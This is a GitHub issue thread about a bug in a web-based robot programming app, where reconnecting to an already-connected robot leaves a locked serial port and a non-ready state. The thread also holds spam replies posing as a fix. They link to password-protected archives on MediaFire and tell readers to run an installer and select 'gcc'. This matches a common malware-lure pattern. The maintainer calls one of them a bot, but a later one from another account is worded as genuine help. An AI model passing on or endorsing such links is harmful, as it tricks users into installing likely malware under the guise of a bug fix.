leaphy-robotics/leaphy-webbased-svelte #119: [bug] connecting to a robot twice results in a non-ready state

sverben, 2024-08-26:
When selecting the connect button in the header twice for the same robot without disconnecting, this will result in a non-ready state due to the port's streams already being locked

It would be nice to check for the following 2 scenarios
1. The cause of the failed connect is that the same robot is already connected
 - We should probably immediately throw a ready state or trigger a reconnect by reserving the old port
2. The cause of the failed connect is that another program is already using it
- Instead of simply throwing a non-ready state and keeping the user guessing as to what went wrong we may want to show a popup to indicate the reason for the failed action

sverben, 2024-08-26:
> Download 
> 
> https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
> 
> password: changeme
> 
> In the installer menu, select "gcc."

Stinky bot

AnaSousa314, 2024-08-26:
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

closed 2024-10-07 by sverben